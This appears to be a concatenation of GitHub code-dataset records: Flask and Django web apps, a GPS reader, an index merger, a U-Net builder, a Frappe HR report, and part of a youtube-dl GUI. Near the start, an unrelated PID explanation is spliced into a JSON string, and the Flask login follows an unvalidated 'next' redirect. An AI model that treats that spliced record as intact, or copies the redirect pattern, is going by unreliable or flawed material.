inited')\nloop()\n","repo_name":"PhystechPozitron/COSCO-RPS","sub_path":"RPS/rps_offboard.py","file_name":"rps_offboard.py","file_ext":"py","file_size_in_byte":7835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"3305677904","text":"from flask import Flask, render_template, 
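get_PID and calculate_setpoint above hand-roll a PID term per axis with module-level integrator state. For reference, a minimal self-contained PID step of the same shape; the gains and inputs here are illustrative, not the node's tuned parameters:

class PID:
    def __init__(self, kp, ki, kd):
        self.kp, self.ki, self.kd = kp, ki, kd
        self.integral = 0.0
        self.prev_error = None

    def step(self, error, dt):
        # Accumulate I, difference for D, and combine with the P term.
        self.integral += error * dt
        derivative = 0.0 if self.prev_error is None else (error - self.prev_error) / dt
        self.prev_error = error
        return self.kp * error + self.ki * self.integral + self.kd * derivative

pid = PID(kp=0.5, ki=0.01, kd=0.1)
print(pid.step(error=1.0, dt=0.1))  # one control-loop tick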
request, redirect, url_for, flash, abort\nfrom flask_login import login_required, login_user, current_user, logout_user\n# from .forms import BookmarkForm, LoginForm, SignupForm\nfrom my_project import forms\nfrom my_project import app, db, login_manager\nfrom my_project import models\n\n\n\n@login_manager.user_loader\ndef load_user(userid):\n    return models.User.query.get(int(userid))\n\n@app.route('/')\n@app.route('/index')\ndef index():\n    return render_template('index.html', new_bookmarks = models.Bookmark.newest(5))\n\n@app.route('/add', methods= ['GET', 'POST'])\n@login_required\ndef add():\n    form = forms.BookmarkForm()\n    if form.validate_on_submit():\n        url = form.url.data\n        description = form.description.data\n        tags = form.tags.data \n        bm = models.Bookmark(user=current_user, url=url, description=description, tags=tags)\n        \n        # db.session.add(bm)\n        current_db_sessions = db.session.object_session(bm)\n        current_db_sessions.add(bm)\n        # db.session.add(bm)\n        db.session.commit()\n        # store_bookmarks(url, description)\n        flash(\"Stored '{}'\".format(bm.description))\n        return redirect(url_for('index'))\n    return render_template('bookmark_form.html', form=form, title=\"Add Bookmark\")\n\n\n@app.route('/edit/<int:bookmark_id>', methods=[\"GET\", \"POST\"])\n@login_required\ndef edit(bookmark_id):\n    bookmark = models.Bookmark.query.get_or_404(bookmark_id)\n    if current_user != bookmark.user:\n        abort(403)\n    form = forms.BookmarkForm(obj=bookmark)\n    if form.validate_on_submit():\n        form.populate_obj(bookmark)\n\n        # current_user.url = form.url.data\n        # current_user.description = form.description.data\n        # db.session.add(current_user._get_current_object())\n        db.session.commit()\n        flash(f\"Updated bookmark is {bookmark.description}\")\n        return redirect(url_for('user', username=current_user.username))\n    return render_template('bookmark_form.html', form=form, title=\"Edit bookmark\")\n\n\n@app.route('/delete/<int:bookmark_id>', methods=['GET', 'POST'])\n@login_required\ndef delete_bookmark(bookmark_id):\n    bookmark = models.Bookmark.query.get_or_404(bookmark_id)\n    if current_user != bookmark.user:\n        abort(403)\n    if request.method == \"POST\":\n        db.session.delete(bookmark)\n        db.session.commit()\n        flash(f\" Deleted '{bookmark.description}'\")\n        return redirect(url_for('user', username=current_user.username))\n    else:\n        flash(\"Please confirm deleting the bookmark.\")\n    return render_template('confirm_delete.html', bookmark=bookmark, nolinks =True)\n\n    \n@app.route('/user/<username>')\n@login_required\ndef user(username):\n    user = models.User.query.filter_by(username=username).first_or_404()\n    \n    return render_template('user.html', user=user)\n    \n\n@app.route('/login', methods=[\"GET\", \"POST\"])\ndef login():\n    form = forms.LoginForm()\n    if form.validate_on_submit():\n        #login and validate the user\n        user = models.User.get_by_username((form.username.data))\n\n        if user is not None and user.check_password(form.password.data):\n            login_user(user, form.remember_me.data)\n            flash(\"Logged in successfully as {}\".format(user.username))\n            return redirect(request.args.get(\"next\") or url_for('user', username=user.username))\n        flash(\"Incorrect username or password\")\n    return render_template(\"login.html\", form=form)\n\n\n\n@app.route('/logout')\ndef logout():\n    logout_user()\n    return redirect(url_for('index'))\n\n@app.route('/signup', methods=[\"GET\", \"POST\"])\ndef signup():\n    form = forms.SignupForm()\n    if form.validate_on_submit():\n        user = models.User(email=form.email.data,\n                            username=form.username.data,\n                            password=form.password.data)\n        
db.session.add(user)\n        db.session.commit()\n        flash(f'Welcome, {user.username}! Please login.')\n        return redirect(url_for('login'))\n    return render_template('signup.html', form=form)\n\n@app.route('/tag/<name>')\ndef tag(name):\n    tag = models.Tag.query.filter_by(name=name).first_or_404()\n    return render_template('tag.html', tag=tag)\n\n\n@app.errorhandler(403)\ndef forbidden(e):\n    return render_template('403.html'), 403\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n    return render_template('404.html'), 404\n\n\n@app.errorhandler(500)\ndef internal_server_error(e):\n    return render_template('500.html'),500\n\n@app.context_processor\ndef inject_tags():\n    return dict(all_tags=models.Tag.all)\n\n    # if request.method == 'POST':\n    #     url = request.form['url']\n    #     store_bookmarks(url)\n    #     # app.logger.debug('Stored url: ' + url)\n    #     flash(\"Stored bookmark: '{}'\".format(url))\n    #     # print(bookmarks)\n    #     return redirect (url_for('index'))\n    # return render_template('add.html')\n\n\n\n\n\n\n","repo_name":"1Jayso/bookmarking-app","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"55"} +{"seq_id":"2865370573","text":"from flask import Flask, render_template, request, redirect\nfrom mysqlconnection import connectToMySQL\n\napp = Flask(__name__)\n\n@app.route(\"/users\")\ndef index():\n    db = connectToMySQL(\"users\")\n    all_users = db.query_db(\"SELECT * FROM friends;\") \n    print(all_users)\n    return render_template(\"users.html\", users = all_users)\n\n\n@app.route(\"/users/form\")\ndef new():\n    return render_template(\"newuser.html\")\n\n@app.route(\"/users/new\", methods = ['POST'])\ndef create():\n    db = connectToMySQL(\"users\")\n    \n    query = \"INSERT INTO friends(first_name,last_name, email) VALUES (%(fname)s, %(lname)s, %(email)s);\"\n    data = {\n        'fname': request.form[\"fname\"],\n        'lname': request.form[\"lname\"],\n        'email': request.form[\"email\"],\n    }\n    new_user_id = db.query_db(query, data)\n    print(new_user_id)\n    return redirect(\"/users\")\n\n\n@app.route(\"/users/<int:id>\")\ndef user(id):\n    print(\"**************\")\n    db = connectToMySQL(\"users\")\n    query = 'SELECT * FROM friends WHERE id = %(id)s;'  # parameterized to avoid SQL injection\n    user = db.query_db(query, {'id': id})\n    print(user)\n    return render_template(\"id.html\", user = user)\n\n@app.route(\"/users/<int:id>/edit\")\ndef edit(id):\n    return render_template(\"edit.html\")\n\n@app.route(\"/users/<int:id>/update\", methods = ['POST'])\ndef update(id):\n    db = connectToMySQL(\"users\")\n    \n    query = 'UPDATE friends SET first_name = %(fname)s, last_name = %(lname)s, email = %(email)s WHERE id = %(id)s;'\n    data = {\n        'fname': request.form[\"fname\"],\n        'lname': request.form[\"lname\"],\n        'email': request.form[\"email\"],\n        'id': id,\n    }\n    new_user_id = db.query_db(query, data)\n    print(new_user_id)\n    return redirect(\"/users\")\n\nif __name__ == \"__main__\":\n    app.run(debug=True)","repo_name":"chizakirov/flask","sub_path":"flask_mysql/users/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"73708064490","text":"import serial\nimport pynmea2\n\n\nclass GPSSensor:\n    SERIAL_BAUDRATE = 9600\n    SERIAL_PORT = '/dev/serial0'\n\n    def __init__(self):\n        self.ser = serial.Serial(self.SERIAL_PORT, self.SERIAL_BAUDRATE)\n        print('Initialized serial interface for GPS Sensor')\n        self.shouldIRun = True\n        self.gps = None\n\n    def start_measurement(self):\n        # self.ser.open()\n        while self.shouldIRun:\n            data = 
self.ser.readline().decode('ascii')\n            if data[0:6] == '$GPGGA':\n                self.gps = pynmea2.parse(data)\n\n    def get_gps(self):\n        return self.gps\n\n    def stop(self):\n        self.shouldIRun = False\n        self.ser.close()\n        print('Closed serial interface for GPS Sensor')\n\n\n# Serial GPS Sensor Test: Expect the coordinates and altitude provided by the sensor\n# import _thread\n# import time\n#\n# if __name__ == \"__main__\":\n#     try:\n#         dut = GPSSensor()\n#         _thread.start_new_thread(dut.start_measurement, ())\n#         while True:\n#             time.sleep(1)\n#             gps = dut.get_gps()\n#             print('lat=' + str(gps.latitude) + str(gps.lat_dir) + ' lon=' + str(gps.longitude) + str(\n#                 gps.lon_dir) + ' altitude=' + str(gps.altitude) + str(gps.altitude_units))\n#\n#\n#     finally:\n#         dut.stop()\n","repo_name":"dnutiu/BLECar","sub_path":"BLECarPiZeroW/dbusObjects/drivers/GPSSensor.py","file_name":"GPSSensor.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"55"} +{"seq_id":"30590536144","text":"\n'''\n *\n *   Name : F21MP- Open Domain Question Answering (ODQA) Agent.\n *\n *   Description :    This class illustrates the process of creating a final index.\n *\n *\n    Indexing format: jonny-2314:t3b6i2r1;6432:t5c8b3i1;\n            Ex.:- johnny-2141:5;1232:1;5432:78;\n            'Johnny-563-1-3-4--2-4-6-'.split('-') ---> ['Johnny', '563', '1', '3', '4', '', '2', '4', '6', '']\n *\n *   Author : Shreyas Arunesh\n *\n *\n *   Reference : https://github.com/neufang/wiki-Dump-Indexing/blob/master/buildInvertedIndexFromWikiDump.py\n'''\nimport os\nfrom collections import defaultdict\n\nindex_map = defaultdict(str)\nnum_files = 0\nnum_pages = 0\nid_title_map = {}\n\n\nclass MergeFiles():\n\n    \"\"\"\n    *\n    * Summary : This class takes the intermediate files as input, merges the data and writes the index to final files.\n                This class uses CreateIndex() under the hood.\n                Ex - intermediate index ----> final index\n    *\n    *\n        Args: num_itermed_files, write_data\n    *\n    \"\"\"\n\n    def __init__(self, num_itermed_files, write_data):\n\n        self.num_itermed_files = num_itermed_files\n        self.write_data = write_data\n\n    '''\n    *\n    * Summary : This function merges the intermediate index to create the final index. \n    The intermediate and initial files are deleted at the end of this process. 
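An offline sketch of the $GPGGA parsing that GPSSensor above does on live serial data, using a commonly cited sample GGA sentence (the coordinates are illustrative):

import pynmea2

# Parse one GGA sentence without any serial hardware attached.
sentence = "$GPGGA,123519,4807.038,N,01131.000,E,1,08,0.9,545.4,M,46.9,M,,*47"
msg = pynmea2.parse(sentence)
print(msg.latitude, msg.lat_dir)    # 48.1173 N
print(msg.longitude, msg.lon_dir)   # 11.5166... E
print(msg.altitude, msg.altitude_units)  # 545.4 M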
\n    *\n    * Args : Param - intermediate files and write data class \n    *\n    * Returns : Creates the final index.\n    *\n    '''\n    def merge_files(self):\n\n        files_data = {}\n        line = {}\n        postings = {}\n        is_file_empty = {i: 1 for i in range(self.num_itermed_files)}\n        tokens = []\n\n        i = 0\n        while i < self.num_itermed_files:\n\n            files_data[i] = open(f'../Dataset/output_data/english_wiki_index/index_{i}.txt', 'r', encoding= 'UTF-8')\n            line[i] = files_data[i].readline().strip('\\n')\n            postings[i] = line[i].split('-')\n            is_file_empty[i] = 0\n            new_token = postings[i][0]\n            if new_token not in tokens:\n                tokens.append(new_token)\n            i += 1\n\n        tokens.sort(reverse=True)\n        num_processed_postings = 0\n        data_to_merge = defaultdict(str)\n        num_files_final = 0\n\n        while sum(is_file_empty.values()) != self.num_itermed_files:\n\n            token = tokens.pop()\n            num_processed_postings += 1\n\n            if num_processed_postings % 30000 == 0:\n                num_files_final = self.write_data.write_final_files(data_to_merge, num_files_final)\n\n                data_to_merge = defaultdict(str)\n\n            i = 0\n            while i < self.num_itermed_files:\n\n                if is_file_empty[i] == 0:\n\n                    if token == postings[i][0]:\n\n                        line[i] = files_data[i].readline().strip('\\n')\n                        data_to_merge[token] += postings[i][1]\n\n                        if len(line[i]):\n                            postings[i] = line[i].split('-')\n                            new_token = postings[i][0]\n\n                            if new_token not in tokens:\n                                tokens.append(new_token)\n                                tokens.sort(reverse=True)\n\n                        else:\n                            is_file_empty[i] = 1\n                            files_data[i].close()\n                            print(f'Removing file {str(i)}')\n                            os.remove(f'../Dataset/output_data/english_wiki_index/index_{str(i)}.txt')\n                i += 1\n\n        num_files_final = self.write_data.write_final_files(data_to_merge, num_files_final)\n\n        return num_files_final\n","repo_name":"shreyasarunesh/OpenDomainQA","sub_path":"Retriever/WikiIndexing/MergeFiles.py","file_name":"MergeFiles.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"55"} +{"seq_id":"19006034940","text":"# _*_coding:utf-8_*_\n# @Author :hd\n# @time :2023/2/20 15:57\n# @filename :traceback_test.py\n# IDE :PyCharm\nimport traceback\ntry:\n    age=int(input(\"Please enter: \"))\n    score=int(input(\"Please enter: \"))\n    s=age/score\nexcept:\n    traceback.print_exc()\nelse:\n    print(s)\nfinally:\n    print(\"over\")\nprint(\"finished\")","repo_name":"hd19940924/Python_study","sub_path":"traceback_test.py","file_name":"traceback_test.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"2155805065","text":"from django.shortcuts import render, get_object_or_404, reverse, redirect\nfrom django.views.generic import ListView, View, UpdateView, DeleteView, FormView\nfrom django.http import HttpResponseRedirect\nfrom .models import Post\nfrom .forms import CommentForm, PostForm, ContactForm\nfrom django.contrib import messages\n\n\n# Create your views here.\nclass PostList(ListView):\n    model = Post\n    queryset = Post.objects.filter(status=1).order_by('-created_date')\n    template_name = 'index.html'\n    paginate_by = 6\n\n\nclass PostDetail(View):\n\n    def get(self, request, slug, *args, **kwargs):\n        queryset = Post.objects.filter(status=1)\n        post = get_object_or_404(queryset, slug=slug)\n        comments = post.comments.filter(approved=True).order_by('created_date')\n        liked = False\n        if post.likes.filter(id=self.request.user.id).exists():\n            liked = True\n\n        return render(\n            request,\n            'post_detail.html',\n            {\n                'post': post,\n                'comments': comments,\n                'commented': False,\n                'liked': liked,\n                
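merge_files above hand-rolls the k-way merge, re-sorting its token list after every insertion; the standard library's heapq.merge lazily merges already-sorted runs. A sketch with in-memory posting runs standing in for the intermediate index files:

import heapq

# Two sorted "runs" of (token, postings) pairs, as the intermediate files hold.
run_a = [("apple", "1:2;"), ("cat", "3:1;")]
run_b = [("apple", "7:4;"), ("dog", "2:5;")]

merged = {}
for token, postings in heapq.merge(run_a, run_b):
    # Concatenate postings for equal tokens, mirroring data_to_merge[token] += ...
    merged[token] = merged.get(token, "") + postings

print(merged)  # {'apple': '1:2;7:4;', 'cat': '3:1;', 'dog': '2:5;'}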
'comment_form': CommentForm()\n },\n )\n\n def post(self, request, slug, *args, **kwargs):\n queryset = Post.objects.filter(status=1)\n post = get_object_or_404(queryset, slug=slug)\n comments = post.comments.filter(approved=True).order_by('created_date')\n liked = False\n if post.likes.filter(id=self.request.user.id).exists():\n liked = True\n\n comment_form = CommentForm(data=request.POST)\n\n if comment_form.is_valid():\n comment_form.instance.email = request.user.email\n comment_form.instance.name = request.user.username\n comment = comment_form.save(commit=False)\n comment.post = post\n comment.save()\n\n return render(\n request,\n 'post_detail.html',\n {\n 'post': post,\n 'comments': comments,\n 'commented': True,\n 'liked': liked,\n 'comment_form': CommentForm()\n },\n )\n\n\nclass PostLike(View):\n\n def post(self, request, slug):\n post = get_object_or_404(Post, slug=slug)\n\n if post.likes.filter(id=request.user.id).exists():\n post.likes.remove(request.user)\n else:\n post.likes.add(request.user)\n\n return HttpResponseRedirect(reverse('post_detail', args=[slug]))\n\n\nclass AddPost(View):\n\n def get(self, request):\n context = {'form': PostForm()}\n return render(request, 'add_post.html', context)\n\n def post(self, request):\n\n if request.method == 'POST':\n form = PostForm(request.POST, initial={\n 'author': request.user.username\n })\n if form.is_valid():\n form.instance.email = request.user.email\n form.instance.name = request.user.username\n form.instance.author = self.request.user\n form.save()\n messages.success(request, 'Your post is awaiting approval.')\n return redirect('home')\n else:\n messages.error(\n request, 'Error: Something went wrong, please try again.')\n context = {'form': form}\n return render(request, 'add_post.html', context)\n else:\n form = PostForm()\n\n context = {'form': form}\n return render(request, 'index.html', context)\n\n\nclass UpdatePost(UpdateView):\n\n model = Post\n template_name = 'update_post.html'\n fields = ['title', 'content', 'excerpt', 'featured_image']\n\n\nclass DeletePost(DeleteView):\n\n model = Post\n template_name = 'delete_post.html'\n success_url = '/'\n\n\nclass BlogPosts(ListView):\n\n model = Post\n queryset = Post.objects.filter(status=1).order_by('-created_date')\n template_name = 'blog_posts.html'\n paginate_by = 6\n\n\nclass Contact(FormView):\n\n template_name = 'contact_us.html'\n form_class = ContactForm\n success_url = '/'\n\n def post(self, request):\n if request.method == 'POST':\n form = ContactForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, 'Thank you! 
Your message has been sent.')\n return redirect('home')\n else:\n messages.error(request, 'This is not a valid form')\n return redirect('home')\n","repo_name":"conor-b1995/p4-GAAStories","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"768690365","text":"\"\"\"A modified version of `Unet` class from `segmentation_models`\"\"\"\nfrom keras.models import Model\nfrom keras.layers import Conv2D, Activation\nfrom segmentation_models.utils import (\n get_layer_number, to_tuple, freeze_model, legacy_support)\nfrom segmentation_models.backbones import get_backbone, get_feature_layers\nfrom segmentation_models.unet.blocks import Transpose2D_block, Upsample2D_block\n\n\ndef build_unet(backbone, classes, skip_connection_layers,\n decoder_filters=(256,128,64,32,16),\n upsample_rates=(2,2,2,2,2),\n n_upsample_blocks=5,\n block_type='upsampling',\n activation='sigmoid',\n use_batchnorm=True):\n\n input = backbone.input\n x = backbone.output\n\n if block_type == 'transpose':\n up_block = Transpose2D_block\n else:\n up_block = Upsample2D_block\n\n # convert layer names to indices\n skip_connection_idx = ([get_layer_number(backbone, l) if isinstance(l, str) else l\n for l in skip_connection_layers])\n\n for i in range(n_upsample_blocks):\n\n # check if there is a skip connection\n skip_connection = None\n if i < len(skip_connection_idx):\n skip_connection = backbone.layers[skip_connection_idx[i]].output\n\n upsample_rate = to_tuple(upsample_rates[i])\n\n x = up_block(decoder_filters[i], i, upsample_rate=upsample_rate,\n skip=skip_connection, use_batchnorm=use_batchnorm)(x)\n\n x = Conv2D(classes, (3,3), padding='same', name='final_conv')(x)\n if isinstance(activation, str):\n x = Activation(activation, name=activation)(x)\n else:\n x = activation(x)\n\n model = Model(input, x)\n\n return model\n\n\nold_args_map = {\n 'freeze_encoder': 'encoder_freeze',\n 'skip_connections': 'encoder_features',\n 'upsample_rates': None, # removed\n 'input_tensor': None, # removed\n}\n\n\n@legacy_support(old_args_map)\ndef Unet(backbone_name='vgg16',\n input_shape=(None, None, 3),\n classes=1,\n activation='sigmoid',\n encoder_weights='imagenet',\n encoder_freeze=False,\n encoder_features='default',\n decoder_block_type='upsampling',\n decoder_filters=(256, 128, 64, 32, 16),\n decoder_use_batchnorm=True,\n **kwargs):\n \"\"\" Unet_ is a fully convolution neural network for image semantic segmentation\n\n Args:\n backbone_name: name of classification model (without last dense layers) used as feature\n extractor to build segmentation model.\n input_shape: shape of input data/image ``(H, W, C)``, in general\n case you do not need to set ``H`` and ``W`` shapes, just pass ``(None, None, C)`` to make your model be\n able to process images af any size, but ``H`` and ``W`` of input images should be divisible by factor ``32``.\n classes: a number of classes for output (output shape - ``(h, w, classes)``).\n activation: name of one of ``keras.activations`` for last model layer\n (e.g. ``sigmoid``, ``softmax``, ``linear``).\n encoder_weights: one of ``None`` (random initialization), ``imagenet`` (pre-training on ImageNet).\n encoder_freeze: if ``True`` set all layers of encoder (backbone model) as non-trainable.\n encoder_features: a list of layer numbers or names starting from top of the model.\n Each of these layers will be concatenated with corresponding decoder block. 
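One design note on the class-based views above: UpdatePost and DeletePost carry no login or ownership check, unlike the per-user checks PostDetail performs for likes. A hedged sketch of one conventional fix using Django's stock mixins (the Post model is assumed from the snippet; the class name here is hypothetical):

from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.views.generic import UpdateView
from .models import Post  # same model import as the snippet above

class GuardedUpdatePost(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
    # Same configuration as UpdatePost, plus login and ownership checks.
    model = Post
    template_name = 'update_post.html'
    fields = ['title', 'content', 'excerpt', 'featured_image']

    def test_func(self):
        # Only the post's author may edit it (mirrors Post.author set in AddPost).
        return self.get_object().author == self.request.user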
If ``default`` is used\n layer names are taken from ``DEFAULT_SKIP_CONNECTIONS``.\n decoder_block_type: one of blocks with following layers structure:\n\n - `upsampling`: ``Upsampling2D`` -> ``Conv2D`` -> ``Conv2D``\n - `transpose`: ``Transpose2D`` -> ``Conv2D``\n\n decoder_filters: list of numbers of ``Conv2D`` layer filters in decoder blocks\n decoder_use_batchnorm: if ``True``, ``BatchNormalisation`` layer between ``Conv2D`` and ``Activation`` layers\n is used.\n\n Returns:\n ``keras.models.Model``: **Unet**\n\n .. _Unet:\n https://arxiv.org/pdf/1505.04597\n\n \"\"\"\n\n backbone = get_backbone(backbone_name,\n input_shape=input_shape,\n input_tensor=None,\n weights=encoder_weights,\n include_top=False)\n\n if encoder_features == 'default':\n encoder_features = get_feature_layers(backbone_name, n=4)\n\n model = build_unet(backbone,\n classes,\n encoder_features,\n decoder_filters=decoder_filters,\n block_type=decoder_block_type,\n activation=activation,\n n_upsample_blocks=len(decoder_filters),\n upsample_rates=(2, 2, 2, 2, 2),\n use_batchnorm=decoder_use_batchnorm)\n\n # lock encoder weights for fine-tuning\n if encoder_freeze:\n freeze_model(backbone)\n\n model.name = 'u-{}'.format(backbone_name)\n\n return model\n\n\n\n","repo_name":"mathandy/andnn","sub_path":"segmentation/unet/unet_with_channelwise_softmax.py","file_name":"unet_with_channelwise_softmax.py","file_ext":"py","file_size_in_byte":5189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"34729275931","text":"from dataclasses import fields\nfrom pkgutil import get_data\nfrom tracemalloc import start\nimport frappe\nfrom frappe import utils\nfrom frappe.utils import cstr, cint, getdate, add_to_date\nfrom frappe import msgprint, _\nfrom calendar import monthrange\nfrom datetime import datetime, timedelta\nimport calendar\nfrom erpnext.hr.doctype.holiday_list.holiday_list import is_holiday\n\n\ndef execute(filters=None):\n\n columns = [\n {\n \"fieldname\": \"employee\",\n \"label\": _(\"Employee\"),\n \"fieldtype\": \"Link\",\n \"options\": \"Employee\",\n },\n {\n \"fieldname\": \"employee_name\",\n \"label\": _(\"Employee Name\"),\n \"fieldtype\": \"Data\",\n \"fetch_from\": \"employee.employee_name\",\n },\n {\n \"fieldname\": \"full_time\",\n \"label\": _(\"Full Time\"),\n \"fieldtype\": \"Data\",\n },\n {\n \"fieldname\": \"employee_time\",\n \"label\": _(\"Employee Time\"),\n \"fieldtype\": \"Data\",\n },\n {\n \"fieldname\": \"precentage_time\",\n \"label\": _(\"Precentage Employee Time\"),\n \"fieldtype\": \"Percent\",\n },\n ]\n data = []\n filters_t = {'status': 'Active'}\n if filters.employee:\n filters_t = {'name': filters.employee}\n\n employees = frappe.db.get_list(\n \"Employee\", fields=['name', 'default_shift', 'employee_name', 'holiday_list'], filters=filters_t)\n for i in employees:\n if i.default_shift and i.holiday_list:\n sh = get_shift_time(i.default_shift)\n employee_data = get_employee_checkin_by_shift(\n i.name, sh, filters.from_date, filters.to_date, i, filters.is_calc_spesfic_hour)\n data.append(employee_data)\n else:\n data.append(\n {\n \"employee\": i.name,\n \"employee_name\": i.employee_name,\n \"full_time\": 0,\n \"employee_time\": 0,\n \"precentage_time\": 0}\n\n )\n\n return columns, data\n\n\ndef get_shift_time(shif_type):\n return frappe.db.sql(\"\"\"\n\tselect working_hour_per_month, start_time, end_time, working_hours_per_day from `tabShift Type` where name = '%s'\n\t\"\"\" % (shif_type))\n\n\ndef 
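A hypothetical usage sketch for the modified Unet above; the backbone name, class count, and activation are illustrative, and exact behavior depends on the segmentation_models/Keras versions the repo pins (Unet is assumed importable from the module above):

model = Unet(
    backbone_name='resnet34',
    input_shape=(None, None, 3),
    classes=4,
    activation='softmax',  # or pass a callable, e.g. a custom channel-wise softmax layer
    encoder_weights='imagenet',
)
model.compile(optimizer='adam', loss='categorical_crossentropy')
model.summary()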
get_employee_checkin_by_shift(employee_name, shift_details, start_date, end_date, employee, is_calc_real=False):\n emloyee_data = {}\n\n d = datetime.now()\n # h = monthrange(d.year, month_map[month])\n start_date = start_date\n end_date = end_date\n employee_check_in = frappe.db.get_list('Employee Checkin', filters={'employee': employee_name, 'time': [\n 'between', (start_date.date(), end_date.date())]}, fields=['name', 'time'], order_by='time')\n for i in employee_check_in:\n if i.time.date() in emloyee_data:\n if 'in' in emloyee_data[i.time.date()]:\n if i.time < emloyee_data[i.time.date()]['in']:\n emloyee_data[i.time.date()]['in'] = i.time\n else:\n emloyee_data[i.time.date()]['in'] = i.time\n\n if 'out' in emloyee_data[i.time.date()]:\n if i.time > emloyee_data[i.time.date()]['out']:\n emloyee_data[i.time.date()]['out'] = i.time\n else:\n emloyee_data[i.time.date()]['out'] = i.time\n else:\n emloyee_data[i.time.date()] = {\n 'in': i.time,\n 'out': i.time\n }\n d = process_data_used_shift(emloyee_data, shift_details)\n if d:\n c, y = calculate_employee_time(d, True, employee, shift_details)\n full_time = shift_details[0][0]\n if is_calc_real:\n full_time = calculate_real_hours(start_date, end_date, shift_details[0][3], employee.holiday_list)\n\n \n percent = 0\n if (c != 0) and (full_time != 0):\n percent = (c/full_time) * 100\n data = {\n \"employee\": employee.name,\n \"employee_name\": employee.employee_name,\n \"full_time\": full_time,\n \"employee_time\": c,\n \"precentage_time\": percent}\n return data\n else:\n data = {\n \"employee\": employee.name,\n \"employee_name\": employee.employee_name,\n \"full_time\": 0,\n \"employee_time\": 0,\n \"precentage_time\": 0}\n return data\n\n\ndef process_data_used_shift(data, shift_details):\n\n new_data = data\n start_hour, start_minute = get_hours_from_shift(shift_details, 1)\n end_hour, end_minute = get_hours_from_shift(shift_details, 2)\n if not start_hour:\n return\n if not start_minute:\n return\n for k in new_data:\n start_time = new_data[k]['in'].replace(\n hour=start_hour, minute=start_minute, second=0)\n end_time = new_data[k]['out'].replace(hour=end_hour, minute=end_minute, second=0)\n if new_data[k]['in'] < start_time:\n\n new_data[k]['in'] = start_time\n if new_data[k]['out'] > end_time:\n new_data[k]['out'] = end_time\n return new_data\n\n\ndef get_hours_from_shift(shift_details, key):\n try:\n return shift_details[0][key].seconds//3600, (shift_details[0][key].seconds//60) % 60\n except:\n return None, None\n\n\ndef calculate_employee_time(data, with_holidays=True, employee=None, shift_data=None):\n total_hours = 0\n employee_hours = 0\n for k in data:\n hour_per_day = data[k]['out'] - data[k]['in']\n minute = (hour_per_day.total_seconds()//60) % 60\n if hour_per_day.total_seconds() // 3600 > 0:\n if not is_holiday(employee.holiday_list, data[k]['out'].date()):\n tot_h = hour_per_day.total_seconds() / 3600\n employee_hours = employee_hours + shift_data[0][3]\n if tot_h <= shift_data[0][3]:\n total_hours = total_hours + tot_h\n else:\n total_hours = total_hours + shift_data[0][3]\n return total_hours, employee_hours\n\ndef calculate_real_hours(start_date, end_date, day_work_hours, holiday_list):\n total_hours = 0\n days = date_range(start_date, end_date)\n for i in days:\n if not is_holiday(holiday_list, i):\n total_hours = total_hours + day_work_hours\n return total_hours\n\n\n\n\n\n\ndef date_range(start, end):\n delta = end - start # as timedelta\n days = [start + timedelta(days=i) for i in range(delta.days + 1)]\n return 
days\n\nmonth_map = {\n    \"Jan\": 1,\n    \"Feb\": 2,\n    \"Mar\": 3,\n    \"Apr\": 4,\n    \"May\": 5,\n    \"Jun\": 6,\n    \"Jul\": 7,\n    \"Aug\": 8,\n    \"Sep\": 9,\n    \"Oct\": 10,\n    \"Nov\": 11,\n    \"Dec\": 12,\n}\n","repo_name":"morghim/hr_report","sub_path":"hr_report/hr_report/report/percentage_of_employee_time/percentage_of_employee_time.py","file_name":"percentage_of_employee_time.py","file_ext":"py","file_size_in_byte":6686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"55"} +{"seq_id":"26610089406","text":"#!/usr/bin/python3\n\nimport youtube_dl\nimport sys, os\nfrom tkinter import *\nimport tkinter.messagebox as tmb\ntry:\n    import pyperclip\nexcept ModuleNotFoundError:\n    paste_event = False\nelse:\n    paste_event = True\n\nroot = Tk()\nroot.title(\"[Gemate Gtk]\")\n\nmenu_bar = Menu(root)\npas = None\n\n#variables\npastes = StringVar()\nticked = IntVar()\n\n#commands and callbacks\ndef download():\n    print(ticked.get())\n    url = pastes.get()\n    ydl_opts={}\n    if not url:\n        tmb.showwarning(title=\"NO URL\", message=\"Please Provide A URL\")\n        return\n    with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n        ydl.download([url])\n    \ndef manual():\n    man_text = \"A tool for downloading YouTube videos and audio, and from other sites as well. Just copy the video URL and paste it, choose your file format, then hit Download.\"\n    tmb.showinfo(title=\"Manual\", message=man_text)\n\ndef paste():\n    if paste_event:\n        past = pyperclip.paste()\n        pastes.set(past)\ndef show_popup(event):\n    popup.tk_popup(event.x_root, event.y_root)\n\nfile = Menu(menu_bar, tearoff=0)\nfiles = menu_bar.add_cascade(label=\"File\", menu=file)\nfile.add_command(label=\"New\", accelerator=\"Ctrl+N\", underline=0)\n\nabout = Menu(menu_bar, tearoff=0)\nabouts = menu_bar.add_cascade(label=\"About\", menu=about)\nabout.add_command(label=\"About\")\n\nhelps = Menu(menu_bar, tearoff=0)\nmenu_bar.add_cascade(label=\"Help\", menu=helps)\nhelps.add_command(label=\"Manpage\", command=manual, accelerator='F1')\n\nextra = Menu(menu_bar, tearoff=0)\nmenu_bar.add_cascade(label='Extras', menu=extra)\nextra.add_command(label=\"Supported 